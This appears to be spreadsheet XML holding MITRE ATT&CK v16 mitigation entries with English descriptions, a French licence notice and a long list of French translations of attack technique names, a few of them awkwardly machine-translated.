    <t>Block execution of code on a system through application control, and/or script blocking.
https://attack.mitre.org/mitigations/M1038</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.
https://attack.mitre.org/mitigations/M1043</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.
https://attack.mitre.org/mitigations/M1045</t>
  </si>
  <si>
    <t>M1039</t>
  </si>
  <si>
    <t>Environment Variable Permissions</t>
  </si>
  <si>
    <t>Prevent modification of environment variables by unauthorized users and groups.
https://attack.mitre.org/mitigations/M1039</t>
  </si>
  <si>
    <t>M1057</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)
https://attack.mitre.org/mitigations/M1057</t>
  </si>
  <si>
    <t>M1025</t>
  </si>
  <si>
    <t>Privileged Process Integrity</t>
  </si>
  <si>
    <t>Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.
https://attack.mitre.org/mitigations/M1025</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.
https://attack.mitre.org/mitigations/M1055</t>
  </si>
  <si>
    <t>M1056</t>
  </si>
  <si>
    <t>Pre-compromise</t>
  </si>
  <si>
    <t>This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.
https://attack.mitre.org/mitigations/M1056</t>
  </si>
  <si>
    <t>M1020</t>
  </si>
  <si>
    <t>SSL/TLS Inspection</t>
  </si>
  <si>
    <t>Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.
https://attack.mitre.org/mitigations/M1020</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms.
https://attack.mitre.org/mitigations/M1046</t>
  </si>
  <si>
    <t>M1060</t>
  </si>
  <si>
    <t>Out-of-Band Communications Channel</t>
  </si>
  <si>
    <t>Establish secure out-of-band communication channels to ensure the continuity of critical communications during security incidents, data integrity attacks, or in-network communication failures. Out-of-band communication refers to using an alternative, separate communication path that is not dependent on the potentially compromised primary network infrastructure. This method can include secure messaging apps, encrypted phone lines, satellite communications, or dedicated emergency communication systems. Leveraging these alternative channels reduces the risk of adversaries intercepting, disrupting, or tampering with sensitive communications and helps coordinate an effective incident response.(Citation: TrustedSec OOB Communications)(Citation: NIST Special Publication 800-53 Revision 5)
https://attack.mitre.org/mitigations/M1060</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/mitigations/M1030</t>
  </si>
  <si>
    <t>M1019</t>
  </si>
  <si>
    <t>Threat Intelligence Program</t>
  </si>
  <si>
    <t>A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.
https://attack.mitre.org/mitigations/M1019</t>
  </si>
  <si>
    <t>M1027</t>
  </si>
  <si>
    <t>Password Policies</t>
  </si>
  <si>
    <t>Set and enforce secure password policies for accounts.
https://attack.mitre.org/mitigations/M1027</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.
https://attack.mitre.org/mitigations/M1040</t>
  </si>
  <si>
    <t>M1018</t>
  </si>
  <si>
    <t>User Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to user accounts.
https://attack.mitre.org/mitigations/M1018</t>
  </si>
  <si>
    <t>M1022</t>
  </si>
  <si>
    <t>Restrict File and Directory Permissions</t>
  </si>
  <si>
    <t>Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.
https://attack.mitre.org/mitigations/M1022</t>
  </si>
  <si>
    <t>M1026</t>
  </si>
  <si>
    <t>Privileged Account Management</t>
  </si>
  <si>
    <t>Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.
https://attack.mitre.org/mitigations/M1026</t>
  </si>
  <si>
    <t>M1024</t>
  </si>
  <si>
    <t>Restrict Registry Permissions</t>
  </si>
  <si>
    <t>Restrict the ability to modify certain hives or keys in the Windows Registry.
https://attack.mitre.org/mitigations/M1024</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious software.
https://attack.mitre.org/mitigations/M1049</t>
  </si>
  <si>
    <t>M1032</t>
  </si>
  <si>
    <t>Multi-factor Authentication</t>
  </si>
  <si>
    <t>Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.
https://attack.mitre.org/mitigations/M1032</t>
  </si>
  <si>
    <t>M1054</t>
  </si>
  <si>
    <t>Software Configuration</t>
  </si>
  <si>
    <t>Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.
https://attack.mitre.org/mitigations/M1054</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>Restrict execution of code to a virtual environment on or in transit to an endpoint system.
https://attack.mitre.org/mitigations/M1048</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.
https://attack.mitre.org/mitigations/M1047</t>
  </si>
  <si>
    <t>M1050</t>
  </si>
  <si>
    <t>Exploit Protection</t>
  </si>
  <si>
    <t>Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.
https://attack.mitre.org/mitigations/M1050</t>
  </si>
  <si>
    <t>M1015</t>
  </si>
  <si>
    <t>Active Directory Configuration</t>
  </si>
  <si>
    <t>Implement robust Active Directory configurations using group policies to control access and reduce the attack surface. Specific examples include:
* Account Configuration: Use provisioned domain accounts rather than local accounts to leverage centralized control and auditing capabilities.
* Interactive Logon Restrictions: Enforce group policies that prohibit interactive logons for accounts that should not directly access systems.
* Remote Desktop Settings: Limit Remote Desktop logons to authorized accounts to prevent misuse by adversaries.
* Dedicated Administrative Accounts: Create specialized domain-wide accounts that are restricted from interactive logons but can perform specific tasks like installations or repository access.
* Authentication Silos: Configure Authentication Silos in Active Directory to create access zones with restrictions based on membership in the Protected Users global security group. This setup enhances security by applying additional protections to high-risk accounts, limiting their exposure to potential attacks.
https://attack.mitre.org/mitigations/M1015</t>
  </si>
  <si>
    <t>M1051</t>
  </si>
  <si>
    <t>Update Software</t>
  </si>
  <si>
    <t>Perform regular software updates to mitigate exploitation risk.
https://attack.mitre.org/mitigations/M1051</t>
  </si>
  <si>
    <t>M1044</t>
  </si>
  <si>
    <t>Restrict Library Loading</t>
  </si>
  <si>
    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
https://attack.mitre.org/mitigations/M1044</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.
https://attack.mitre.org/mitigations/M1042</t>
  </si>
  <si>
    <t>M1036</t>
  </si>
  <si>
    <t>Account Use Policies</t>
  </si>
  <si>
    <t>Configure features related to account use like login attempt lockouts, specific login times, etc.
https://attack.mitre.org/mitigations/M1036</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>Protect sensitive information with strong encryption.
https://attack.mitre.org/mitigations/M1041</t>
  </si>
  <si>
    <t>name[fr]</t>
  </si>
  <si>
    <t>description[fr]</t>
  </si>
  <si>
    <t>copyright[fr]</t>
  </si>
  <si>
    <t>Mitre ATT&amp;CK v16 - Menaces et mesures d’atténuation</t>
  </si>
  <si>
    <t>Conditions d’utilisation
LICENCE
MITRE Corporation (MITRE) vous accorde par la présente une licence non exclusive et libre de droits pour utiliser ATT&amp;CK® à des fins de recherche, de développement et commerciales. Toute copie que vous faites à ces fins est autorisée à condition que vous reproduisiez la désignation de droit d’auteur de MITRE et la présente licence dans une telle copie.
" © 2022 La société MITRE. Cette œuvre est reproduite et distribuée avec la permission de The MITRE Corporation.
AVERTISSEMENTS
MITRE ne prétend pas qu’ATT&amp;CK énumère toutes les possibilités pour les types d’actions et de comportements documentés dans le cadre de son modèle d’adversaire et de son cadre de techniques. L’utilisation des informations contenues dans ATT&amp;CK pour aborder ou couvrir des catégories complètes de techniques ne garantira pas une couverture défensive complète, car il peut y avoir des techniques non divulguées ou des variations de techniques existantes non documentées par ATT&amp;CK.
TOUS LES DOCUMENTS ET LES INFORMATIONS QU’ILS CONTIENNENT SONT FOURNIS « EN L’ÉTAT » ET LE CONTRIBUTEUR, L’ORGANISATION QU’IL REPRÉSENTE OU QUI EST PARRAINÉE PAR (LE CAS ÉCHÉANT), LA MITRE CORPORATION, SON CONSEIL D’ADMINISTRATION, SES DIRIGEANTS, SES AGENTS ET SES EMPLOYÉS, DÉCLINENT TOUTE GARANTIE, EXPRESSE OU IMPLICITE, Y COMPRIS, MAIS SANS S’Y LIMITER, TOUTE GARANTIE QUE L’UTILISATION DES INFORMATIONS QU’ILS CONTIENNENT N’ENFREINDRA AUCUN DROIT OU TOUTE GARANTIE IMPLICITE DE QUALITÉ MARCHANDE OU D’ADÉQUATION À UN PARTICULIER BUT.</t>
  </si>
  <si>
    <t>Injection supplémentaire de mémoire de fenêtre</t>
  </si>
  <si>
    <t>Tâche planifiée</t>
  </si>
  <si>
    <t>Archiver via l’utilitaire</t>
  </si>
  <si>
    <t>Instrumentation de gestion Windows</t>
  </si>
  <si>
    <t>Capture d’écran</t>
  </si>
  <si>
    <t>Stockage sans fichier</t>
  </si>
  <si>
    <t>Scripts d’initialisation de démarrage ou de connexion</t>
  </si>
  <si>
    <t>Adversaire au milieu</t>
  </si>
  <si>
    <t>Découverte du propriétaire du système/de l’utilisateur</t>
  </si>
  <si>
    <t>Acquérir des infrastructures</t>
  </si>
  <si>
    <t>Découverte de conteneurs et de ressources</t>
  </si>
  <si>
    <t>Sans serveur</t>
  </si>
  <si>
    <t>Encodage standard</t>
  </si>
  <si>
    <t>Charges utiles intégrées</t>
  </si>
  <si>
    <t>Modules d’authentification enfichables</t>
  </si>
  <si>
    <t>Rétablir l’instance Cloud</t>
  </si>
  <si>
    <t>Recueillir les informations sur l’hôte de la victime</t>
  </si>
  <si>
    <t>Certificats numériques</t>
  </si>
  <si>
    <t>Enregistrement de frappe</t>
  </si>
  <si>
    <t>Exclusions de fichiers/chemins d’accès</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Linux et Mac</t>
  </si>
  <si>
    <t>Devinage du mot de passe</t>
  </si>
  <si>
    <t>Données techniques d’achat</t>
  </si>
  <si>
    <t>Vidage des informations d’identification du système d’exploitation</t>
  </si>
  <si>
    <t>Modules partagés</t>
  </si>
  <si>
    <t>Données du référentiel de configuration</t>
  </si>
  <si>
    <t>Effacement de la structure du disque</t>
  </si>
  <si>
    <t>Inondation directe du réseau</t>
  </si>
  <si>
    <t>Interception de chemin par la variable d’environnement PATH</t>
  </si>
  <si>
    <t>Accès direct aux volumes</t>
  </si>
  <si>
    <t>Intelligence artificielle</t>
  </si>
  <si>
    <t>Modifier la hiérarchie des ressources cloud</t>
  </si>
  <si>
    <t>Règles de masquage des e-mails</t>
  </si>
  <si>
    <t>Défiguration externe</t>
  </si>
  <si>
    <t>Fichier crypté/encodé</t>
  </si>
  <si>
    <t>Adresses IP</t>
  </si>
  <si>
    <t>Inondation d’épuisement du système d’exploitation</t>
  </si>
  <si>
    <t>Profil PowerShell</t>
  </si>
  <si>
    <t>Javascript</t>
  </si>
  <si>
    <t>Suppression déclenchée par le cycle de vie</t>
  </si>
  <si>
    <t>Création ou modification d’un processus système</t>
  </si>
  <si>
    <t>Services à distance externes</t>
  </si>
  <si>
    <t>Voler un cookie de session Web</t>
  </si>
  <si>
    <t>Travail d’orchestration de conteneur</t>
  </si>
  <si>
    <t>Algorithmes de génération de domaine</t>
  </si>
  <si>
    <t>Double extension de fichier</t>
  </si>
  <si>
    <t>Contourner le contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Pompage SMS</t>
  </si>
  <si>
    <t>Découverte de la connexion Internet</t>
  </si>
  <si>
    <t>Sudo et mise en cache Sudo</t>
  </si>
  <si>
    <t>Archivage via une méthode personnalisée</t>
  </si>
  <si>
    <t>Modifier l’infrastructure de calcul dans le cloud</t>
  </si>
  <si>
    <t>Périphériques réseau</t>
  </si>
  <si>
    <t>Publicité malveillante</t>
  </si>
  <si>
    <t>Découverte des groupes d’autorisations</t>
  </si>
  <si>
    <t>Collecte d’e-mails</t>
  </si>
  <si>
    <t>Gestionnaire de comptes de sécurité</t>
  </si>
  <si>
    <t>Micrologiciel du système</t>
  </si>
  <si>
    <t>Rechercher des sites Web appartenant à des victimes</t>
  </si>
  <si>
    <t>Groupes de cloud</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de registre des services</t>
  </si>
  <si>
    <t>DNS/DNS passif</t>
  </si>
  <si>
    <t>Application Épuisement Inondation</t>
  </si>
  <si>
    <t>Compromettre les dépendances logicielles et les outils de développement</t>
  </si>
  <si>
    <t>Serveur DNS</t>
  </si>
  <si>
    <t>Effacement du disque</t>
  </si>
  <si>
    <t>API de métadonnées d’instance cloud</t>
  </si>
  <si>
    <t>Mémoire sécurisée</t>
  </si>
  <si>
    <t>Découverte de la stratégie de groupe</t>
  </si>
  <si>
    <t>Kit d’amorçage</t>
  </si>
  <si>
    <t>Données à partir d’un support amovible</t>
  </si>
  <si>
    <t>Transfert des données locales</t>
  </si>
  <si>
    <t>Correspondance du nom ou de l’emplacement légitime</t>
  </si>
  <si>
    <t>Manipulation des données stockées</t>
  </si>
  <si>
    <t>Craquage de mot de passe</t>
  </si>
  <si>
    <t>Collecte d’e-mails locaux</t>
  </si>
  <si>
    <t>Porte-clés</t>
  </si>
  <si>
    <t>Démarrage automatique de démarrage ou d’ouverture de session</t>
  </si>
  <si>
    <t>Affaiblir le chiffrement</t>
  </si>
  <si>
    <t>Jetons SAML</t>
  </si>
  <si>
    <t>Type de fichier Masquerade</t>
  </si>
  <si>
    <t>Arrêt du service</t>
  </si>
  <si>
    <t>Découverte du pilote de périphérique</t>
  </si>
  <si>
    <t>Compte de domaine</t>
  </si>
  <si>
    <t>Configuration active</t>
  </si>
  <si>
    <t>Masquer les artefacts</t>
  </si>
  <si>
    <t>Échange de données dynamique</t>
  </si>
  <si>
    <t>Fichier malveillant</t>
  </si>
  <si>
    <t>Identifier le tempo de l’entreprise</t>
  </si>
  <si>
    <t>Protocoles de publication/abonnement</t>
  </si>
  <si>
    <t>Matériel</t>
  </si>
  <si>
    <t>Entacher le contenu partagé</t>
  </si>
  <si>
    <t>Modification de la fiducie</t>
  </si>
  <si>
    <t>Cryptographie symétrique</t>
  </si>
  <si>
    <t>Compte local</t>
  </si>
  <si>
    <t>Comptes de médias sociaux</t>
  </si>
  <si>
    <t>Démarrage en mode sans échec</t>
  </si>
  <si>
    <t>Démarrage TFTP</t>
  </si>
  <si>
    <t>DNS à flux rapide</t>
  </si>
  <si>
    <t>Vérifications du système</t>
  </si>
  <si>
    <t>Groupes de domaines</t>
  </si>
  <si>
    <t>Vulnérabilités</t>
  </si>
  <si>
    <t>Lien vers le spearphishing</t>
  </si>
  <si>
    <t>Effacer les journaux système Linux ou Mac</t>
  </si>
  <si>
    <t>Exploitation d’une application ou d’un système</t>
  </si>
  <si>
    <t>Démarrage de l’application Office</t>
  </si>
  <si>
    <t>Rôles Cloud supplémentaires</t>
  </si>
  <si>
    <t>Processeurs d’impression</t>
  </si>
  <si>
    <t>Accessoire de spearphishing</t>
  </si>
  <si>
    <t>Charges utiles dépouillées</t>
  </si>
  <si>
    <t>Modèle objet composant</t>
  </si>
  <si>
    <t>Détournement d’ordre de recherche DLL</t>
  </si>
  <si>
    <t>Collecte automatisée</t>
  </si>
  <si>
    <t>Données du presse-papiers</t>
  </si>
  <si>
    <t>Système de fichiers Proc</t>
  </si>
  <si>
    <t>Gestionnaires de mots de passe</t>
  </si>
  <si>
    <t>Contournement de Gatekeeper</t>
  </si>
  <si>
    <t>Cible intempestive</t>
  </si>
  <si>
    <t>Découverte du service système</t>
  </si>
  <si>
    <t>Reniflage du réseau</t>
  </si>
  <si>
    <t>Signature de code</t>
  </si>
  <si>
    <t>Données du stockage dans le cloud</t>
  </si>
  <si>
    <t>Manipulation des données d’exécution</t>
  </si>
  <si>
    <t>Informations d’identification dans le registre</t>
  </si>
  <si>
    <t>Découverte du partage du réseau</t>
  </si>
  <si>
    <t>Découverte des périphériques</t>
  </si>
  <si>
    <t>Briser les arbres de processus</t>
  </si>
  <si>
    <t>Topologie de réseau</t>
  </si>
  <si>
    <t>Certificats de signature de code</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires Windows</t>
  </si>
  <si>
    <t>Compléments</t>
  </si>
  <si>
    <t>Découverte des informations système</t>
  </si>
  <si>
    <t>Protocole de la couche application</t>
  </si>
  <si>
    <t>Transfert de données à distance</t>
  </si>
  <si>
    <t>Rôles supplémentaires dans les clusters de conteneurs</t>
  </si>
  <si>
    <t>Tâche/travail planifié</t>
  </si>
  <si>
    <t>Dépendances d’approbation du réseau</t>
  </si>
  <si>
    <t>Amplification de la réflexion</t>
  </si>
  <si>
    <t>DLL de filtre de mot de passe</t>
  </si>
  <si>
    <t>Extensions de navigateur</t>
  </si>
  <si>
    <t>Inondation d’épuisement du service</t>
  </si>
  <si>
    <t>Compromettre la chaîne d’approvisionnement matérielle</t>
  </si>
  <si>
    <t>Fichiers Ccache</t>
  </si>
  <si>
    <t>Effacer l’historique et les configurations des connexions réseau</t>
  </si>
  <si>
    <t>Torréfaction AS-REP</t>
  </si>
  <si>
    <t>Serveur Privé Virtuel</t>
  </si>
  <si>
    <t>AutoHotKey et AutoIT</t>
  </si>
  <si>
    <t>Réduire l’espace clé</t>
  </si>
  <si>
    <t>Effacer l’historique des commandes</t>
  </si>
  <si>
    <t>Exécution indirecte de commandes</t>
  </si>
  <si>
    <t>Réplication via un support amovible</t>
  </si>
  <si>
    <t>Données du système local</t>
  </si>
  <si>
    <t>Débrouiller/décoder des fichiers ou des informations</t>
  </si>
  <si>
    <t>Règles Outlook</t>
  </si>
  <si>
    <t>Affaiblir les défenses</t>
  </si>
  <si>
    <t>Comptes cloud</t>
  </si>
  <si>
    <t>Comptes de messagerie</t>
  </si>
  <si>
    <t>Groupes locaux ou de domaines supplémentaires</t>
  </si>
  <si>
    <t>Télécharger un logiciel malveillant</t>
  </si>
  <si>
    <t>Compromission de la chaîne d’approvisionnement</t>
  </si>
  <si>
    <t>Exploiter une application publique</t>
  </si>
  <si>
    <t>Voler ou falsifier des billets Kerberos</t>
  </si>
  <si>
    <t>Informations d’identification à partir des magasins de mots de passe</t>
  </si>
  <si>
    <t>Exfiltration sur le service Web</t>
  </si>
  <si>
    <t>Logiciel d’accès à distance</t>
  </si>
  <si>
    <t>Domaines</t>
  </si>
  <si>
    <t>Archive via la bibliothèque</t>
  </si>
  <si>
    <t>Détournement d’exécution de thread</t>
  </si>
  <si>
    <t>Application : Flottage</t>
  </si>
  <si>
    <t>Identifiants non sécurisés</t>
  </si>
  <si>
    <t>Moniteurs de port</t>
  </si>
  <si>
    <t>Effacer les données de la boîte aux lettres</t>
  </si>
  <si>
    <t>Crochet de connexion</t>
  </si>
  <si>
    <t>Injection de contenu</t>
  </si>
  <si>
    <t>Injection de procédé</t>
  </si>
  <si>
    <t>Exfiltration sur Webhook</t>
  </si>
  <si>
    <t>Signalisation routière</t>
  </si>
  <si>
    <t>Connexions directes aux VM Cloud</t>
  </si>
  <si>
    <t>Exécution du proxy binaire système</t>
  </si>
  <si>
    <t>Jumeau maléfique</t>
  </si>
  <si>
    <t>Chargement du code réfléchissant</t>
  </si>
  <si>
    <t>Découverte Wi-Fi</t>
  </si>
  <si>
    <t>Exclusion mutuelle</t>
  </si>
  <si>
    <t>Ignorer les interruptions de processus</t>
  </si>
  <si>
    <t>Évasion vers l’hôte</t>
  </si>
  <si>
    <t>Modification du raccourci</t>
  </si>
  <si>
    <t>Découverte de la fenêtre d’application</t>
  </si>
  <si>
    <t>Compte de messagerie</t>
  </si>
  <si>
    <t>Évasion basée sur le temps</t>
  </si>
  <si>
    <t>Détournement SSH</t>
  </si>
  <si>
    <t>Désactiver la journalisation des événements Windows</t>
  </si>
  <si>
    <t>Transfert programmé</t>
  </si>
  <si>
    <t>Partages SMB/Windows Admin</t>
  </si>
  <si>
    <t>Image interne de l’implant</t>
  </si>
  <si>
    <t>Tunneling de protocole</t>
  </si>
  <si>
    <t>Panneau de configuration</t>
  </si>
  <si>
    <t>Traversée de traduction d’adresses réseau</t>
  </si>
  <si>
    <t>Outil de téléchargement</t>
  </si>
  <si>
    <t>Fournisseur de support de sécurité</t>
  </si>
  <si>
    <t>Utiliser un autre matériel d’authentification</t>
  </si>
  <si>
    <t>Fournisseurs d’informations sur les menaces</t>
  </si>
  <si>
    <t>Exfiltration sur un autre support réseau</t>
  </si>
  <si>
    <t>Vidage de la configuration du périphérique réseau</t>
  </si>
  <si>
    <t>Recueillir des informations sur l’identité de la victime</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu du système</t>
  </si>
  <si>
    <t>Archiver les données collectées</t>
  </si>
  <si>
    <t>Détournement de SIP et de fournisseurs de confiance</t>
  </si>
  <si>
    <t>Détournement de session de navigateur</t>
  </si>
  <si>
    <t>Services à distance</t>
  </si>
  <si>
    <t>Protocoles de messagerie</t>
  </si>
  <si>
    <t>Identité hybride</t>
  </si>
  <si>
    <t>Analyse des vulnérabilités</t>
  </si>
  <si>
    <t>Rechercher dans des bases de données techniques ouvertes</t>
  </si>
  <si>
    <t>Applications de l’électron</t>
  </si>
  <si>
    <t>Désactiver ou modifier le système d’audit Linux</t>
  </si>
  <si>
    <t>Contrôleur de domaine non autorisé</t>
  </si>
  <si>
    <t>Modification de la politique de signature de code</t>
  </si>
  <si>
    <t>Déployer le conteneur</t>
  </si>
  <si>
    <t>Modifier le registre</t>
  </si>
  <si>
    <t>Lancer Daemon</t>
  </si>
  <si>
    <t>Découverte de l’infrastructure cloud</t>
  </si>
  <si>
    <t>Informations d’identification des navigateurs Web</t>
  </si>
  <si>
    <t>Interception de chemin par détournement d’ordre de recherche</t>
  </si>
  <si>
    <t>Dégradation</t>
  </si>
  <si>
    <t>Régions cloud inutilisées/non prises en charge</t>
  </si>
  <si>
    <t>Usurpation DHCP</t>
  </si>
  <si>
    <t>Détournement de session de service à distance</t>
  </si>
  <si>
    <t>Remplissage binaire</t>
  </si>
  <si>
    <t>Modification de la stratégie de groupe</t>
  </si>
  <si>
    <t>Découverte des informations du navigateur</t>
  </si>
  <si>
    <t>Clés privées</t>
  </si>
  <si>
    <t>Serveur</t>
  </si>
  <si>
    <t>Gestion à distance Windows</t>
  </si>
  <si>
    <t>Exfiltration via Bluetooth</t>
  </si>
  <si>
    <t>Comptes par défaut</t>
  </si>
  <si>
    <t>Fournisseurs de temps</t>
  </si>
  <si>
    <t>Piège</t>
  </si>
  <si>
    <t>Détournement dynamique de Linker</t>
  </si>
  <si>
    <t>Communication par le biais de supports amovibles</t>
  </si>
  <si>
    <t>Effacer les journaux d’événements Windows</t>
  </si>
  <si>
    <t>Empoisonnement LLMNR/NBT-NS et relais SMB</t>
  </si>
  <si>
    <t>Modification des autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Mémoire LSASS</t>
  </si>
  <si>
    <t>Analyse active</t>
  </si>
  <si>
    <t>Mécanisme de contrôle de l’élévation des abus</t>
  </si>
  <si>
    <t>Créer un processus avec un jeton</t>
  </si>
  <si>
    <t>Setuid et Setgid</t>
  </si>
  <si>
    <t>Modèle objet de composant distribué</t>
  </si>
  <si>
    <t>Pulvérisation de mots de passe</t>
  </si>
  <si>
    <t>Proxy externe</t>
  </si>
  <si>
    <t>Capture du portail Web</t>
  </si>
  <si>
    <t>Adresses e-mail</t>
  </si>
  <si>
    <t>Voix de spearphishing</t>
  </si>
  <si>
    <t>Informations d’identification de domaine mises en cache</t>
  </si>
  <si>
    <t>Clés autorisées SSH</t>
  </si>
  <si>
    <t>Appliances de sécurité réseau</t>
  </si>
  <si>
    <t>Injection d’options d’exécution de fichier image</t>
  </si>
  <si>
    <t>Moteurs</t>
  </si>
  <si>
    <t>Relations d’affaires</t>
  </si>
  <si>
    <t>Accès cloud avec élévation de privilèges temporaire</t>
  </si>
  <si>
    <t>Capture vidéo</t>
  </si>
  <si>
    <t>Processus Doppelgänging</t>
  </si>
  <si>
    <t>Découverte de la configuration réseau du système</t>
  </si>
  <si>
    <t>Supprimer une instance Cloud</t>
  </si>
  <si>
    <t>Référentiels de code</t>
  </si>
  <si>
    <t>Faiblesse des autorisations de fichiers du programme d’installation de l’exécutable</t>
  </si>
  <si>
    <t>Caractéristiques d’accessibilité</t>
  </si>
  <si>
    <t>Détournement de bande passante</t>
  </si>
  <si>
    <t>Découverte de compte</t>
  </si>
  <si>
    <t>Procuration</t>
  </si>
  <si>
    <t>Interpréteur de commandes et de scripts</t>
  </si>
  <si>
    <t>Blocage de l’indicateur</t>
  </si>
  <si>
    <t>Noms des employés</t>
  </si>
  <si>
    <t>Découverte de l’approbation de domaine</t>
  </si>
  <si>
    <t>Billet d’or</t>
  </si>
  <si>
    <t>Exfiltration automatisée</t>
  </si>
  <si>
    <t>Désactiver ou modifier le pare-feu cloud</t>
  </si>
  <si>
    <t>Remplacement de droite à gauche</t>
  </si>
  <si>
    <t>Micrologiciel des composants</t>
  </si>
  <si>
    <t>Retrait de l’indicateur</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 crypté symétrique</t>
  </si>
  <si>
    <t>Macros de modèles Office</t>
  </si>
  <si>
    <t>Confluent</t>
  </si>
  <si>
    <t>Passez le billet</t>
  </si>
  <si>
    <t>Commande d’administration de conteneur</t>
  </si>
  <si>
    <t>Découverte de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Résolution dynamique</t>
  </si>
  <si>
    <t>Tâche ou service de mascarade</t>
  </si>
  <si>
    <t>Appel de procédure asynchrone</t>
  </si>
  <si>
    <t>Duplication du trafic</t>
  </si>
  <si>
    <t>Modification du fichier Plist</t>
  </si>
  <si>
    <t>DLL AppCert</t>
  </si>
  <si>
    <t>Règle de transfert d’e-mail</t>
  </si>
  <si>
    <t>Données mises en scène</t>
  </si>
  <si>
    <t>Voler ou falsifier des certificats d’authentification</t>
  </si>
  <si>
    <t>Enregistrement de l’appareil</t>
  </si>
  <si>
    <t>Découverte des connexions réseau système</t>
  </si>
  <si>
    <t>Compromettre l’infrastructure</t>
  </si>
  <si>
    <t>Contournement de la marque du Web</t>
  </si>
  <si>
    <t>Désactiver le matériel cryptographique</t>
  </si>
  <si>
    <t>Pré-démarrage du système d’exploitation</t>
  </si>
  <si>
    <t>Construire une image sur l’hôte</t>
  </si>
  <si>
    <t>Injection exécutable portable</t>
  </si>
  <si>
    <t>Comptes compromis</t>
  </si>
  <si>
    <t>Lancement ctl</t>
  </si>
  <si>
    <t>CLI de périphérique réseau</t>
  </si>
  <si>
    <t>Histoire de la fête</t>
  </si>
  <si>
    <t>Attaque de rétrogradation</t>
  </si>
  <si>
    <t>Virtualisation/Évasion du bac à sable</t>
  </si>
  <si>
    <t>Service web</t>
  </si>
  <si>
    <t>Informations d’identification dans les fichiers</t>
  </si>
  <si>
    <t>Calcul DNS</t>
  </si>
  <si>
    <t>Éléments de connexion</t>
  </si>
  <si>
    <t>Capacités de la scène</t>
  </si>
  <si>
    <t>Cible du lien</t>
  </si>
  <si>
    <t>Canaux à plusieurs étages</t>
  </si>
  <si>
    <t>Vol financier</t>
  </si>
  <si>
    <t>Garde-fous d’exécution</t>
  </si>
  <si>
    <t>Découverte d’objets de stockage dans le cloud</t>
  </si>
  <si>
    <t>Énumération des journaux</t>
  </si>
  <si>
    <t>Usurpation d’identité/vol de jetons</t>
  </si>
  <si>
    <t>Exfiltration vers le dépôt de code</t>
  </si>
  <si>
    <t>Cognement de port</t>
  </si>
  <si>
    <t>Contrebande d’icônes LNK</t>
  </si>
  <si>
    <t>Voler le jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Informations d’identification cloud supplémentaires</t>
  </si>
  <si>
    <t>Exécution par l’utilisateur</t>
  </si>
  <si>
    <t>Défiguration interne</t>
  </si>
  <si>
    <t>Utilisateurs masqués</t>
  </si>
  <si>
    <t>Créer et emprunter l’identité d’un jeton</t>
  </si>
  <si>
    <t>Préférences de stratégie de groupe</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non-C2 chiffré asymétrique</t>
  </si>
  <si>
    <t>Compte Cloud</t>
  </si>
  <si>
    <t>Découverte des processus</t>
  </si>
  <si>
    <t>Journalisation de l’historique des commandes Impair</t>
  </si>
  <si>
    <t>DLL du fournisseur de réseau</t>
  </si>
  <si>
    <t>Abonnement aux événements Windows Management Instrumentation</t>
  </si>
  <si>
    <t>CDN</t>
  </si>
  <si>
